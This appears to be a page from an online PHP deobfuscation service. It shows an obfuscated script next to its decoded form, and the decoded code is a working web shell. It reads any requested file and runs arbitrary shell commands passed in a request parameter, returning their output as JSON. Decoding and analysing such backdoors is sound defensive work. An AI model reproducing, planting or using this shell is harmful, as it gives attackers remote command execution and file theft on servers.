Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php goto pVBm_; w0j9Q: $action = $_REQUEST["\141\x63\164\151\x6f\x6e"]; goto zPj23; zP..

Decoded Output download

<?php 
 goto pVBm_; w0j9Q: $action = $_REQUEST["action"]; goto zPj23; zPj23: if ($action == "getContent") { $path_to_file = $_REQUEST["path"]; if (file_exists($path_to_file)) { http_response_code(200); header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($path_to_file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($path_to_file)); flush(); readfile($path_to_file); die; } else { http_response_code(404); header("Content-Type: application/json"); echo json_encode(array("message" => "Path " . $path_to_file . " does not exist or is not readable.", "path" => $path_to_file)); } } elseif ($action == "3x3c") { $command = $_REQUEST["kmd"]; $descriptorspec = array(0 => array("pipe", "w"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); chdir("/"); $process = proc_open($command, $descriptorspec, $pipes); if (!is_resource($process)) { die(1); } $stdout = ''; $buffer = ''; do { $buffer = fread($pipes[1], $chunk_size); $stdout = $stdout . $buffer; } while (!feof($pipes[1]) && strlen($buffer) != 0); $stderr = ''; $buffer = ''; do { $buffer = fread($pipes[2], $chunk_size); $stderr = $stderr . $buffer; } while (!feof($pipes[2]) && strlen($buffer) != 0); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); header("Content-Type: application/json"); echo json_encode(array("stdout" => $stdout, "stderr" => $stderr, "3x3c" => $command)); } goto FqR2D; pVBm_: $chunk_size = 1024; goto w0j9Q; FqR2D: ?>

Did this file decode correctly?

Original Code

<?php
 goto pVBm_; w0j9Q: $action = $_REQUEST["\141\x63\164\151\x6f\x6e"]; goto zPj23; zPj23: if ($action == "\147\145\164\103\x6f\x6e\x74\145\156\164") { $path_to_file = $_REQUEST["\x70\x61\164\150"]; if (file_exists($path_to_file)) { http_response_code(200); header("\x43\157\x6e\x74\145\x6e\164\x2d\104\x65\163\143\x72\x69\160\x74\x69\x6f\x6e\x3a\x20\106\x69\154\145\40\x54\162\x61\156\163\x66\145\162"); header("\x43\157\156\164\145\156\x74\55\124\171\x70\x65\72\x20\141\x70\160\154\151\143\x61\164\151\157\156\57\x6f\x63\x74\145\164\x2d\163\164\x72\x65\x61\155"); header("\x43\x6f\x6e\164\x65\156\x74\x2d\x44\151\x73\160\157\x73\151\x74\151\157\156\x3a\40\141\x74\x74\141\143\x68\x6d\x65\156\164\73\x20\x66\151\x6c\145\x6e\x61\155\145\x3d\42" . basename($path_to_file) . "\42"); header("\105\x78\x70\151\162\x65\163\x3a\40\60"); header("\103\x61\x63\150\x65\55\103\x6f\x6e\x74\162\x6f\x6c\x3a\x20\x6d\x75\x73\x74\x2d\162\x65\x76\141\x6c\151\x64\x61\x74\145"); header("\120\162\x61\x67\155\x61\72\40\x70\165\x62\x6c\x69\x63"); header("\103\x6f\156\164\145\156\x74\x2d\114\x65\x6e\147\x74\x68\x3a\40" . filesize($path_to_file)); flush(); readfile($path_to_file); die; } else { http_response_code(404); header("\103\157\x6e\164\145\x6e\164\x2d\124\x79\x70\x65\72\x20\x61\160\x70\154\151\x63\x61\164\x69\x6f\x6e\x2f\x6a\x73\157\156"); echo json_encode(array("\x6d\145\163\163\x61\x67\145" => "\120\x61\164\150\40" . $path_to_file . "\x20\x64\x6f\145\163\x20\156\x6f\x74\x20\x65\x78\x69\x73\164\x20\157\x72\x20\151\163\x20\x6e\157\x74\x20\x72\145\x61\x64\x61\142\x6c\145\x2e", "\160\141\164\x68" => $path_to_file)); } } elseif ($action == "\x33\170\63\143") { $command = $_REQUEST["\x6b\x6d\x64"]; $descriptorspec = array(0 => array("\160\x69\160\x65", "\x77"), 1 => array("\160\151\x70\x65", "\x77"), 2 => array("\160\151\x70\145", "\x77")); chdir("\x2f"); $process = proc_open($command, $descriptorspec, $pipes); if (!is_resource($process)) { die(1); } $stdout = ''; $buffer = ''; do { $buffer = fread($pipes[1], $chunk_size); $stdout = $stdout . $buffer; } while (!feof($pipes[1]) && strlen($buffer) != 0); $stderr = ''; $buffer = ''; do { $buffer = fread($pipes[2], $chunk_size); $stderr = $stderr . $buffer; } while (!feof($pipes[2]) && strlen($buffer) != 0); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); header("\x43\x6f\x6e\164\x65\156\164\55\x54\171\x70\145\72\x20\141\160\x70\x6c\x69\x63\x61\164\151\157\156\57\152\163\157\156"); echo json_encode(array("\163\x74\x64\157\165\x74" => $stdout, "\163\164\144\x65\x72\162" => $stderr, "\63\x78\x33\x63" => $command)); } goto FqR2D; pVBm_: $chunk_size = 1024; goto w0j9Q; FqR2D: ?>

Function Calls

None

Variables

None

Stats

MD5	0f884be9ae149f6dabdef48f15cdd164
Eval Count	0
Decode Time	76 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats